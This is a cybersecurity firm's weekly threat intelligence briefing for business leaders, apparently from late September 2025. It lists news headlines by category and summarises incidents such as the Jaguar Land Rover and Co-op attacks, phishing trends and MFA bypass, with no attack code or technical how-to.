Most people still can’t identify a phishing attack written by AI - and that's a huge problem, survey warns | TechRadar

Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security

Phishing Dominates EU-Wide Intrusions, says ENISA - Infosecurity Magazine

Foreign states ramp up cyber attacks on EU with AI-driven phishing and DDoS campaigns | IT Pro

New MatrixPDF toolkit turns PDFs into phishing and malware lures

Ukrainian Cops Spoofed in Fileless Phishing on Kyiv

Business Email Compromise (BEC)/Email Account Compromise (EAC)

How scammers have mastered AI: deepfakes, fake websites, and phishing emails | Kaspersky official blog

AI-Powered Voice Cloning Raises Vishing Risks

North Korea’s fake IT workers targeting healthcare, finance • The Register

Real-Time AI Voice Cloning Powers Convincing Vishing Attacks

Your Service Desk is the New Attack Vector—Here's How to Defend It.

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

That annoying SMS phish you just got may have come from a box like this - Ars Technica

Other Social Engineering

How scammers have mastered AI: deepfakes, fake websites, and phishing emails | Kaspersky official blog

AI-Powered Voice Cloning Raises Vishing Risks

North Korea’s fake IT workers targeting healthcare, finance • The Register

Your Service Desk is the New Attack Vector—Here's How to Defend It.

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

That annoying SMS phish you just got may have come from a box like this - Ars Technica

Fraud, Scams and Financial Crime

Brits warned as illegal robo-callers fined £550,000 • The Register

Interpol sting operation across Africa sees 260 arrested for sextortion and romance scams - BBC News

China court sentences 11 people to death over alleged role in family-run Myanmar scam operations | China | The Guardian

Artificial Intelligence

How scammers have mastered AI: deepfakes, fake websites, and phishing emails | Kaspersky official blog

AI-Powered Voice Cloning Raises Vishing Risks

Proofpoint Exec: 'Phishing is the Leading Cause of Breaches Globally'

Most people still can’t identify a phishing attack written by AI - and that's a huge problem, survey warns | TechRadar

Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security

Foreign states ramp up cyber attacks on EU with AI-driven phishing and DDoS campaigns | IT Pro

43% of workers say they've shared sensitive info with AI - including financial and client data | ZDNET

Attackers Use AI to Build Ransomware at Rapid Scale

LLM-Based LAMEHUG Malware Dynamically Generates Commands for Reconnaissance and Data Theft

UN seeks to build consensus on ‘safe, secure and trustworthy’ AI | CyberScoop

EvilAI Malware Masquerades as AI Tools to Infiltrate Global Organizations

Beware! Threat Actors Distributing Malicious AI Tools as Chrome Extensions - Cyber Security News

Dark side of the boom: How hackers are vibing with AI - The Economic Times

The hidden cyber risks of deploying generative AI

Google Gemini Vulnerabilities Let Attackers Exfiltrate User’s Saved Data and Location

Microsoft Reduces Israel's Access to Cloud and AI Products Over Reports of Mass Surveillance in Gaza - SecurityWeek

Google Patches Gemini AI Hacks Involving Poisoned Logs, Search Results - SecurityWeek

New Android Trojan "Datzbro" Tricking Elderly with AI-Generated Facebook Travel Events

2FA/MFA

Gone in 60 Minutes: Akira Defeats MFA for SonicWall SSL VPNs

Losing your phone on a trip? Brutal. Not doing these 3 things first? Security nightmare | PCWorld

Malware

LLM-Based LAMEHUG Malware Dynamically Generates Commands for Reconnaissance and Data Theft

EvilAI Malware Masquerades as AI Tools to Infiltrate Global Organizations

Beware! Threat Actors Distributing Malicious AI Tools as Chrome Extensions - Cyber Security News

New MatrixPDF toolkit turns PDFs into phishing and malware lures

This devious malware has jumped from Meta over to Google Ads and YouTube to spread - here's how to stay safe | TechRadar

Weaponized Malwarebytes, LastPass, Citibank, SentinelOne, and Others on GitHub Deliver Malware

Hackers Injecting Exploiting WordPress Websites With Silent Malware to Gain Admin Access

Fake Microsoft Teams installers push Oyster malware via malvertising

Security Bite: Mac users are finally taking malware seriously, per new report - 9to5Mac

Fake Postmark MCP npm package stole emails with one-liner • The Register

Microsoft leaves Mac users exposed to GitHub Mac malware

Confucius Shifts from Document Stealers to Python Backdoors - Infosecurity Magazine

Researchers Expose SVG and PureRAT Phishing Threats Targeting Ukraine and Vietnam

Microsoft uncovers new variant of XCSSET macOS malware in targeted attacks

China-linked APT Phantom Taurus uses Net-Star malware in espionage campaigns against key sectors

New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks

Ukraine Warns of CABINETRAT Backdoor + XLL Add-ins Spread via Signal ZIPs

Mobile

Phishing Is Moving to Mobile. Is Your Security?

Losing your phone on a trip? Brutal. Not doing these 3 things first? Security nightmare | PCWorld

Brits warned as illegal robo-callers fined £550,000 • The Register

That annoying SMS phish you just got may have come from a box like this - Ars Technica

New Android RAT Klopatra Targets Financial Data - Infosecurity Magazine

Android malware uses VNC to give attackers hands-on access

How Android 16 Will Detect Fake Cell Towers To Help Keep You Safe

Apple Updates iOS and macOS to Prevent Malicious Font Attacks - SecurityWeek

New Android Trojan "Datzbro" Tricking Elderly with AI-Generated Facebook Travel Events

Smishing Campaigns Exploit Cellular Routers to Target Belgium - Infosecurity Magazine

Denial of Service/DoS/DDoS

Foreign states ramp up cyber attacks on EU with AI-driven phishing and DDoS campaigns | IT Pro

Council website down as group claims Suffolk and Essex cyber-attacks - BBC News

Internet of Things – IoT

Tile security flaws can let stalkers track your location, and more

Army says it's mitigated 'critical' cybersecurity deficiencies in early NGC2 prototype - Breaking Defense

Data Breaches/Leaks

LLM-Based LAMEHUG Malware Dynamically Generate Commands for Reconnaissance and Data Theft

Red Hat breach might affect major organizations | Cybernews

Unofficial Postmark MCP npm silently stole users' emails

Oracle customers being bombarded with emails claiming widespread data theft | CyberScoop

Hackers 'behind nursery cyber attack' tell Sky News they are releasing more data on dozens of children | UK News | Sky News

Salesforce faces class action after Salesloft breach • The Register

Harrods hit by second cyber attack in six months | Computer Weekly

1.5 Million Impacted by Allianz Life Data Breach - SecurityWeek

Latest Airline Security Breach Leaks Passports, IDs, Other Info

WestJet confirms cyberattack exposed IDs, passports in June incident

Renault and Dacia cyber attack: customer phone numbers and addresses stolen from third party | Auto Express

Data breach at dealership software provider impacts 766k clients

Hackers claim theft of Boeing supplier documents | Cybernews

Air Force admits SharePoint privacy issue; reports of breach • The Register

Sex offenders, terrorists, drug dealers, exposed in spyware breach | Malwarebytes

Organised Crime & Criminal Actors

UK convicts "Bitcoin Queen" in world’s largest cryptocurrency seizure

Inside Dark Web Exploit Markets in 2025: Pricing, Access & Active Sellers

UK Police Just Seized £5.5 Billion in Bitcoin — The World's Largest Crypto Bust

Why The US Just Put An $11M Dollar Bounty On This Ukranian Hacker

Interpol sting operation across Africa sees 260 arrested for sextortion and romance scams - BBC News

Beijing-backed burglars target government web servers • The Register

UK Government Wants to Keep $7 Billion in Stolen Bitcoin It Has Seized - Decrypt

The cybercrime arms race

China court sentences 11 people to death over alleged role in family-run Myanmar scam operations | China | The Guardian

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

£5.5B Bitcoin fraudster pleads guilty after years on the run • The Register

UK Police Just Seized £5.5 Billion in Bitcoin — The World's Largest Crypto Bust

UK Government Wants to Keep $7 Billion in Stolen Bitcoin It Has Seized - Decrypt

Insider Risk and Insider Threats

North Korea’s fake IT workers targeting healthcare, finance • The Register

Ransomware gang sought BBC reporter’s help in hacking media giant

'You'll never need to work again': Criminals offer reporter money to hack BBC - BBC News

Insurance

Ransomware remains the leading cause of costly cyber claims - Help Net Security

Cyber attacks: '80%' of ransomware victims pay up, insurer says | Money News | Sky News

Cyber insurance claims steady, but risk environment remains complex | Insurance Business America

More CVEs, But Cyber Insurers Aren't Altering Policies

Calls for mandatory reporting as 59% of SMEs hit by cyber attacks | Insurance Times

Zurich urges national cybersecurity metrics adoption | Insurance Business America

Supply Chain and Third Parties

The suspected weak link in the Jaguar Land Rover and M&S hacks

Jaguar Land Rover rescued with £1.5bn government-backed loan after crippling cyber attack | UK News | Sky News

Over three-quarters of West Midlands firms feel impact of JLR cyber-attack - The Stratford Observer

Tata Motors shares slip 1% as Moody’s downgrades outlook after JLR cyber incident - The Economic Times

Renault and Dacia cyber attack: customer phone numbers and addresses stolen from third party | Auto Express

Hackers claim theft of Boeing supplier documents | Cybernews

Software Supply Chain

Fake Postmark MCP npm package stole emails with one-liner • The Register

Cloud/SaaS

Fake Microsoft Teams installers push Oyster malware via malvertising

$50 Battering RAM Attack Breaks Intel and AMD Cloud Security Protections

Critical WD My Cloud bug allows remote command injection

Microsoft Reduces Israel's Access to Cloud and AI Products Over Reports of Mass Surveillance in Gaza - SecurityWeek

Air Force admits SharePoint privacy issue; reports of breach • The Register

Outages

Afghanistan hit by communications blackout after Taliban shuts internet | Afghanistan | The Guardian

Encryption

UK once again demands backdoor to Apple’s encrypted cloud storage - Ars Technica

Linux and Open Source

Linux Kernel ksmbd Vulnerability Allows Remote Attackers to Execute Arbitrary Code

The hidden risks inside open-source code - Help Net Security

Organizations Warned of Exploited Sudo Vulnerability - SecurityWeek

Passwords, Credential Stuffing & Brute Force Attacks

Losing your phone on a trip? Brutal. Not doing these 3 things first? Security nightmare | PCWorld

NIST’s new password rules | Cybernews

Social Media

Imgur blocks UK users after data watchdog signals possible fine

New Android Trojan "Datzbro" Tricking Elderly with AI-Generated Facebook Travel Events

UK minister suggests government could leave Elon Musk's X • The Register

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

Malvertising

Fake Microsoft Teams installers push Oyster malware via malvertising

This devious malware has jumped from Meta over to Google Ads and YouTube to spread - here's how to stay safe | TechRadar

Regulations, Fines and Legislation

Imgur blocks UK users after data watchdog signals possible fine

NIS2 and DORA explained: What Every Business Leader Needs to Know - Infosecurity Magazine

Brits warned as illegal robo-callers fined £550,000 • The Register

Shutdown Threat Puts Federal Cyber on Edge - InfoRiskToday

Cyber threat-sharing law set to lapse as govt shutdown looms • The Register

CISA kills agreement with nonprofit that runs MS-ISAC • The Register

UK once again demands backdoor to Apple’s encrypted cloud storage - Ars Technica

UK to roll out digital ID for right to work by 2029 • The Register

Six-month reporting obligation for cyberattacks on critical infrastructures

Department of War Launches New Cybersecurity Framework

Models, Frameworks and Standards

NIS2 and DORA explained: What Every Business Leader Needs to Know - Infosecurity Magazine

NIST’s new password rules | Cybernews

Careers, Working in Cyber and Information Security

Budgets, Staffing and Skills Fail to Keep Pace With Rising Cyber Threats, Finds New ISACA Research

Security risks leave 84 percent of IT pros feeling stressed at work - BetaNews

Why burnout is a growing problem in cybersecurity - BBC News

Two-Thirds of Organizations Have Unfilled Cybersecurity Positions - Infosecurity Magazine

Law Enforcement Action and Take Downs

UK convicts "Bitcoin Queen" in world’s largest cryptocurrency seizure

UK Police Just Seized £5.5 Billion in Bitcoin — The World's Largest Crypto Bust

Internet fraud in Africa: Interpol arrest over 200 cybercrime scammers across Africa for Operation Contender 3.0 - BBC News Pidgin

Interpol sting operation across Africa sees 260 arrested for sextortion and romance scams - BBC News

UK Government Wants to Keep $7 Billion in Stolen Bitcoin It Has Seized - Decrypt

Why The US Just Put An $11M Dollar Bounty On This Ukranian Hacker

Dutch teens arrested for trying to spy on Europol for Russia

China court sentences 11 people to death over alleged role in family-run Myanmar scam operations | China | The Guardian

Misinformation, Disinformation and Propaganda

Despite Russian Influence, Moldova Votes Pro-EU, Highlighting Future Election Risks


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Britain may already be at war with Russia, former head of MI5 says | Defence policy | The Guardian

Germany “not at war, but no longer at peace”: Merz - Euromaidan Press

Investigation finds Russian surveillance, sabotage ship near European undersea cables, FT reports

Macron warns of 'secret army' of Russian bots destroying Western democracies from within | УНН

NATO’s Article 4 Alert: The Path to Disentanglement - The National Interest

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Danish PM calls for strong answer from EU leaders to Russia's hybrid attacks - BBC News

Nation State Actors

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Submarine cable security is all at sea • The Register

Development of Cyber Forces in NATO Countries [Alternative title: From Tallinn to DC: NATO’s Cyber Frontline]

Met warns that hostile states are recruiting youths for crime - BBC News

China

New China APT Strikes With Precision and Persistence

The China Threat to UK Firms | SC Media UK

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Russia, Chinese Hacking Buffets Europe - GovInfoSecurity

Chinese hackers exploiting VMware zero-day since October 2024

German infrastructure hit by drones, cybercrime, arson – DW – 09/30/2025

China-linked APT Phantom Taurus uses Net-Star malware in espionage campaigns against key sectors

Cybersecurity Experts Say These Humanoid Robots Secretly Send Data to China and Let Hackers Take Over Your Network

China court sentences 11 people to death over alleged role in family-run Myanmar scam operations | China | The Guardian

Beijing-backed burglars target government web servers • The Register

Judge rules that drone maker DJI is affiliated with China’s defense industry — company to stay on Pentagon’s list of Chinese military companies | Tom's Hardware

Russia

Britain may already be at war with Russia, former head of MI5 says | Defence policy | The Guardian

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Russia, Chinese Hacking Buffets Europe - GovInfoSecurity

Investigation finds Russian surveillance, sabotage ship near European undersea cables, FT reports

The Russian spy ship stalking Europe’s subsea cables

Macron warns of 'secret army' of Russian bots destroying Western democracies from within | УНН

NATO’s Article 4 Alert: The Path to Disentanglement - The National Interest

Ukraine war briefing: Europe ‘no longer at peace’ with Russia, says German chancellor | Ukraine | The Guardian

German infrastructure hit by drones, cybercrime, arson – DW – 09/30/2025

Danish PM calls for strong answer from EU leaders to Russia's hybrid attacks - BBC News

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

Dutch teens arrested for trying to spy on Europol for Russia

Despite Russian Influence, Moldova Votes Pro-EU, Highlighting Future Election Risks

New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks

Ukraine Warns of CABINETRAT Backdoor + XLL Add-ins Spread via Signal ZIPs

Ukrainian Cops Spoofed in Fileless Phishing on Kyiv

Iran

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Cyber criminals from Russia and Iran target MoD staff with fake LinkedIn job ads

Met warns that hostile states are recruiting youths for crime - BBC News

North Korea

North Korea’s fake IT workers targeting healthcare, finance • The Register

Western Countries In Cyber ‘Arms Race,' Ex-UK Cyber Chief Warns | Miami Herald

Vulnerability Management

CISOs advised to rethink vulnerability management as exploits sharply rise | CSO Online

More CVEs, But Cyber Insurers Aren't Altering Policies

UK and US urge Cisco users to ditch end-of-life security appliances | Computer Weekly

"Almost all" businesses being weighed down by Microsoft technical debt ahead of Windows 10 End Of Life | TechRadar

The hidden risks inside open-source code - Help Net Security

Vulnerabilities

Gone in 60 Minutes: Akira Defeats MFA for SonicWall SSL VPNs

Nearly 50,000 Cisco firewalls vulnerable to actively exploited flaws

High-Severity Vulnerabilities Patched in VMware Aria Operations, NSX, vCenter - SecurityWeek

UK and US urge Cisco users to ditch end-of-life security appliances | Computer Weekly

Chinese hackers exploiting VMware zero-day since October 2024

Linux Kernel ksmbd Vulnerability Allows Remote Attackers to Execute Arbitrary Code

Apple Updates iOS and macOS to Prevent Malicious Font Attacks - SecurityWeek

Google Gemini Vulnerabilities Let Attackers Exfiltrate User’s Saved Data and Location

Hackers Actively Scanning to Exploit Palo Alto Networks PAN-OS Global Protect Vulnerability

OpenSSL Vulnerabilities Let Attackers Execute Malicious Code and Recover Private Key Remotely

Adobe Analytics bug leaked customer tracking data to other tenants

'Delightful' Red Hat OpenShift AI bug allows full takeover • The Register

Broadcom Fails to Disclose Zero-Day Exploitation of VMware Vulnerability - SecurityWeek

Chrome 141 and Firefox 143 Patches Fix High-Severity Vulnerabilities - SecurityWeek

CISA warns of critical Linux Sudo flaw exploited in attacks

New bug in classic Outlook can only be fixed via Microsoft support

WD patches NAS security flaw which could have allowed full takeover | TechRadar

Hackers exploit Fortra GoAnywhere flaw before public alert

Notepad++ DLL Hijacking Vulnerability Let Attackers Execute Malicious Code

DrayTek warns of remote code execution bug in Vigor routers


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.


Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 26 September 2025

Black Arrow Cyber Threat Intelligence Briefing 26 September 2025:

-Finance Professionals Rank Cyber as The Top Risk for 2026

-UK Co-operative Group Counts a £200m Sales Hit from Its April Cyber Incident

-Tata Motors Shares Drop 5% after JLR Cyber Attack

-Airport Outages Expose Fragile Links in Aviation Supply Chains

-Attackers Focus on MFA Bypass and Supply Chain Routes

-Insurer Reclaiming Costs from Technology Providers

-Ransomware Crews Multiply and Focus on Data Theft

-Phishing Surges as The Top Doorway for Ransomware In 2025

-Phishing Campaigns Spread Beyond Email as Criminals Exploit New Channels

-Generative AI Attacks Accelerate with Deepfakes and Malicious Prompts

-Stolen Credentials Fuel a Thriving Cybercrime Marketplace

-China Linked Attackers Embedded in Many Enterprises

-Law Firms Face Mounting Raids on Sensitive Client Files

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

Cyber risk continues to dominate the business agenda, with incidents showing the scale of disruption and loss. A recurring insight this week is that attackers often remain undetected for long periods, exploiting MFA weaknesses and third-party flaws; supply chain risks are also prominent. The threat landscape is evolving: phishing is spreading beyond email, stolen credentials fuel cybercrime, and generative AI introduces deepfakes and malicious prompts.

To address these challenges, business leaders need an objective view of their risks and should establish their cyber strategy across people, operations and technology. Independent testing of response plans and governance over suppliers and AI systems are essential; cyber resilience must be led from the top, not delegated to IT.


Top Cyber Stories of the Last Week

Finance Professionals Rank Cyber as The Top Risk for 2026

Cyber security has emerged as the most significant threat to businesses, with over eight in ten chief internal auditors naming it their primary concern. Recent incidents targeting major UK firms and critical infrastructure have exposed severe financial and operational impacts, with some organisations facing losses in the hundreds of millions and prolonged supply chain disruption. The Chartered Institute of Internal Auditors cautions that attacks are becoming increasingly common and advanced, often fuelled by developments in artificial intelligence.

https://www.icaew.com/insights/viewpoints-on-the-news/2025/sep-2025/cyber-security-biggest-risk-as-businesses-reel-from-major-attacks

UK Co-operative Group Counts a £200m Sales Hit from Its April Cyber Incident

The Co-operative Group has disclosed widespread disruption and financial impact following a cyber attack in April. The incident affected multiple business units, including funeral services, and led to a substantial drop in sales, reportedly exceeding £200 million. Member data was compromised, and the organisation posted a significant pre-tax loss for the first half of the year. Senior executives acknowledged the event exposed both operational strengths and areas requiring improvement, with further consequences anticipated in the months ahead.

https://www.proactiveinvestors.co.uk/companies/news/1079144/co-op-suffers-200m-revenue-hit-as-it-counts-cost-of-april-s-cyber-attack-1079144.html

Tata Motors Shares Drop 5% after JLR Cyber Attack

Jaguar Land Rover continues to grapple with a serious cyber incident that has halted production at UK facilities and affected tens of thousands of employees. The company has extended its operational pause while investigations proceed, and analysts suggest the financial impact could be considerable. Reports indicate the firm lacked cyber insurance coverage for this event, and the disruption is believed to be costing millions each week, posing reputational and financial challenges for both JLR and its parent company.

https://www.business-standard.com/markets/news/tata-motors-share-price-today-fall-on-2-billion-euro-jlr-cyberattck-news-production-halt-125092500303_1.html

Airport Outages Expose Fragile Links in Aviation Supply Chains

Recent cyber attacks at major European airports disrupted check-in and boarding after hackers targeted Collins Aerospace’s Muse software, which manages shared airport systems. The incident highlighted the vulnerabilities linked to third-party dependencies, with operational and reputational consequences spreading rapidly across multiple countries. The case emphasises the importance of robust supply chain governance, ongoing monitoring, and well-tested recovery strategies, as weaknesses in external vendors can be just as damaging as breaches within an organisation’s own systems.

https://www.digitaljournal.com/tech-science/airport-cyberattacks-calls-for-stronger-supply-chain-security-and-business-resilience/article

Attackers Focus on MFA Bypass and Supply Chain Routes

Attackers are increasingly exploiting weaknesses in identity and access controls, with Ontinue’s mid-2025 report highlighting a sharp rise in supply chain incidents, which now account for nearly a third of cyber cases. Almost 40% of cloud intrusions involved multiple hidden access methods, enabling attackers to remain undetected for weeks, while 20% used token replay to bypass multi-factor authentication. Phishing campaigns using image-based email attachments grew by 70%, and USB-based attacks surged by more than a quarter. The report stresses the need for stronger identity safeguards, closer supplier oversight and tighter control of overlooked entry points.

https://www.scworld.com/news/threat-actors-turning-to-mfa-bypass-usb-malware-and-supply-chain-attacks

Insurer Reclaiming Costs from Technology Providers

ACE American Insurance, part of Chubb, is pursuing legal action against two technology vendors after reimbursing ransomware-related losses for staffing firm CoWorx. The insurer claims the cloud provider failed to implement adequate security controls, including strong authentication, while the monitoring firm did not respond effectively to early warning signs. These alleged lapses enabled attackers to encrypt systems and demand payment. ACE is seeking compensation through claims of negligence and breach of contract.

https://www.claimsjournal.com/news/national/2025/09/22/333061.htm

Ransomware Crews Multiply and Focus on Data Theft

Ransomware activity continues to surge, with more than 3,700 victims in the first half of 2025, a 20% increase on late 2024 and 67% higher year-on-year. The growth is fuelled by a rental model where criminals lease tools to affiliates, enabling more attacks with less effort. Nearly 90 groups were active, including 35 new entrants, making threats harder to track. North America and Europe remain prime targets, with NATO members accounting for 65% of cases. Increasingly, attackers focus on stealing and threatening to release data, highlighting the need for stronger early detection.

https://www.helpnetsecurity.com/2025/09/26/report-2025-ransomware-attack-trends/

Phishing Surges as The Top Doorway for Ransomware In 2025

Phishing has emerged as the leading method for ransomware delivery, with a marked increase in incidents compared to the previous year. A recent report shows that nearly nine in ten organisations experienced ransomware-related events, and many faced repeated attacks. The proliferation of phishing-as-a-service tools has lowered the barrier to entry, enabling less sophisticated actors to launch damaging campaigns. Despite confidence in existing defences, many firms lack robust procedures to manage identity exposure and investigate breaches.

https://betanews.com/2025/09/23/phishing-is-now-the-main-entry-point-for-ransomware/

Phishing Campaigns Spread Beyond Email as Criminals Exploit New Channels

Phishing is no longer confined to email. Attackers are increasingly leveraging social media, messaging apps, and malicious ads to distribute fraudulent links. This trend exploits the fact that employees often access personal apps on work devices, creating new entry points for attackers. Reports highlight that more than 60% of stolen login details now come from social media sites, making them a prime target. Once an account is compromised, attackers can gain access to critical business systems and data, with the potential for widespread breaches. Traditional email-focused defences are no longer sufficient to address this risk.

https://www.bleepingcomputer.com/news/security/why-attackers-are-moving-beyond-email-based-phishing-attacks/

Generative AI Attacks Accelerate With Deepfakes and Malicious Prompts

Threats linked to generative AI are rising sharply, with a growing number of organisations reporting incidents involving deepfakes and prompt manipulation. Fake audio is increasingly used to deceive staff and bypass controls, while AI assistants are being targeted through crafted inputs. Gartner advises that existing security frameworks must evolve to address these risks, and anticipates that proactive AI protection will represent a significant share of security budgets by the end of the decade.

https://www.itpro.com/security/generative-ai-attacks-are-accelerating-at-an-alarming-rate

Stolen Credentials Fuel a Thriving Cybercrime Marketplace

An expanding underground economy is centred around stolen digital identities, with login credentials traded as valuable assets. Financial institutions are particularly exposed, facing substantial losses per breach. Attackers often exploit weak identity governance and gaps in AI system security. Despite the scale of the threat, identity protection remains under-prioritised, prompting calls for stronger oversight and executive-level commitment to reduce financial and reputational exposure.

https://www.helpnetsecurity.com/2025/09/26/stolen-identity-cybercrime-economy/

China Linked Attackers Embedded in Many Enterprises

Google warns that suspected China-linked threat actors have compromised multiple organisations since March, often remaining undetected for over a year. Attackers gained access by exploiting flaws in widely used software, installing hidden tools that bypass standard monitoring. Targets have included law firms, technology providers and outsourcing firms, with intruders seeking valuable data and email access from key staff. Google noted the attackers are adapting quickly and scaling their operations, which means more companies are likely to uncover historic or ongoing breaches in the coming years.

https://www.theregister.com/2025/09/24/google_china_spy_report/

Law Firms Face Mounting Raids on Sensitive Client Files

Cyber criminals are increasingly targeting law firms to gain access to confidential client information. Both small practices and large legal organisations are at risk due to outdated systems, insufficient staff training and poor cyber hygiene. One in five firms experienced an attack last year, and nearly 40 percent of those incidents led to data compromise. Some breaches have forced legal bodies offline or resulted in costly settlements. With nation-state actors also involved and emerging threats such as deepfakes, clients are placing greater importance on firms that demonstrate strong and proactive cyber security measures.

https://www.helpnetsecurity.com/2025/09/23/law-firms-cyberthreats/

Threats

Ransomware, Extortion and Destructive Attacks

Phishing is now the main entry point for ransomware - BetaNews

How One Bad Password Ended a 158-Year-Old Business

Insurer Says Tech Services Firms Should Pay for Insured’s Ransomware Damages

Known. Emerging. Unstoppable? Ransomware Attacks Still Evade Defenses

Organizations Must Update Defenses to Scattered Spider Tactics, Expert - Infosecurity Magazine

Ransomware groups are multiplying, raising the stakes for defenders - Help Net Security

WarLock ransomware group attack surge | Cybernews

BlackLock Ransomware Attacking Windows, Linux, and VMware ESXi Environments

Scattered Spider Targets Financial Sector After Alleged Retirement | Security Magazine

UK chancellor blames cyberattacks on Russia despite evidence • The Register

GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware

Suspect arrested in cyberattack on Collins Aerospace check-in software | SC Media

Scattered Spider Member Surrenders Amid Shutdown Claims

Teen arrested in UK was a core figure in Scattered Spider’s operations | CyberScoop

Ransomware Payments vs Rising Incident Counts in 2025 - What’s Changing in RaaS Economics

Another alleged Scattered Spider member arrested • The Register

$115 million ransomware hacker arrested over extortion attacks — Scattered Spider alumnus allegedly involved in over 120 computer network intrusions targeting 47 U.S. entities | Tom's Hardware

Vegas cops book teen allegedly involved in casino hacks • The Register

Alleged Scattered Spider member turns self in to Las Vegas police | The Record from Recorded Future News

Obscura, an obscure new ransomware variant

INC ransomware: what you need to know | Fortra

Will banning ransom payments help protect UK businesses? - Raconteur

U.K. to introduce mandatory ransomware reporting, raising risk of ‘box-ticking’ compliance | Article | Compliance Week

Ransomware Victims

Insurer Says Tech Services Firms Should Pay for Insured’s Ransomware Damages

Jaguar Land Rover to bear full cost of cyber attack due to lack of insurance cover

How One Bad Password Ended a 158-Year-Old Business

Co-op suffers £200m revenue hit as it counts cost of April's cyber attack

Which UK retailers have been hit by cyber attacks in 2025? - Raconteur

All the major cyber attacks in the UK this year: Are they on the rise and what can be done? | The Standard

A cyberattack on Collins Aerospace disrupted operations at major European airports

Collins Aerospace ‘cyber attack’ latest in series of incidents at UK airports | The Standard

Airlines seen as vulnerable as ransomware confirmed in weekend cyberattack

Airport operations recovering following ransomware attack on Collins checking in software - Aviation Business News

Jaguar Land Rover Says Shutdown Will Continue Until at Least Oct 1 After Cyberattack - SecurityWeek

Tata Motors slides after reports of extended JLR shutdowns due to cyberattack | Capital Market News - Business Standard

Jaguar suppliers 'facing collapse': Ministers urged to act as car giant extends shutdowns into next month following devastating cyber attack | This is Money

Cyber Attack On JLR Should Be A ‘Wake-Up Call’ For British Industry - Minister - PM Today

Jaguar Land Rover restarts some IT systems as suppliers call for urgent support | Jaguar Land Rover | The Guardian

‘Like a bomb threat’ – Co-op looks forward as it grapples with cyber attack fallout | Retail Week

Volvo Group Employee Data Stolen in Ransomware Attack - SecurityWeek

Hackers claim to have stolen pictures, names and addresses of children in nursery firm cyber attack | UK News | Sky News

Scattered Spider Targets Financial Sector After Alleged Retirement | Security Magazine

Was the chancellor right to accuse Russia of being behind recent UK cyber attacks? | ITV News

Phishing & Email Based Attacks

Phishing is now the main entry point for ransomware - BetaNews

Hackers are now using deepfakes in phishing scams to fool banking apps and steal your money - how to stay safe | Tom's Guide

17,500 Phishing Domains Target 316 Brands Across 74 Countries in Global PhaaS Surge

Why attackers are moving beyond email-based phishing attacks

How to Spot and Stop Phishing Attacks Before They Happen - DevX

Microsoft spots LLM-obfuscated phishing attack - Help Net Security

AI vs. AI: Detecting an AI-obfuscated phishing campaign | Microsoft Security Blog

Threat Actors Attacking ICS Computers With Malicious Scripts and Phishing Pages

Phishing Campaign Evolves into PureRAT Deployment - Infosecurity Magazine

Other Social Engineering

What to do if your company discovers a North Korean worker in its ranks | CyberScoop

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

How hiring fraud has become a cybersecurity threat vector | Biometric Update

Criminals are driving fake cell towers through cities to blast out scam texts | TechSpot

US employees 'unprepared' for cybersecurity threats - New Study

North Korean IT workers use fake profiles to steal crypto - Help Net Security

Threat Actors Using Copyright Takedown Claims to Deploy Malware

Lazarus RAT code resurfaces in North Korean IT-worker scams • The Register

Fraud, Scams and Financial Crime

Criminals are driving fake cell towers through cities to blast out scam texts | TechSpot

FBI Warns of Spoofed IC3 Website - SecurityWeek

Scammers are now faking the FBI's own website - here's how to stay safe | ZDNET

Google just took down 224 malicious apps with 38 million installs in massive SlopAds fraud campaign — how to stay safe | Tom's Guide

Eurojust Arrests 5 in €100M Cryptocurrency Investment Fraud Spanning 23 Countries

Artificial Intelligence

Hackers are now using deepfakes in phishing scams to fool banking apps and steal your money - how to stay safe | Tom's Guide

ChatGPT 'ShadowLeak' Allows Hackers to Steal Emails

Deepfake Attacks Hit Two-Thirds of Businesses - Infosecurity Magazine

Microsoft spots LLM-obfuscated phishing attack - Help Net Security

Hackers are using GPT-4 to build a virtual assistant - here's what we know | TechRadar

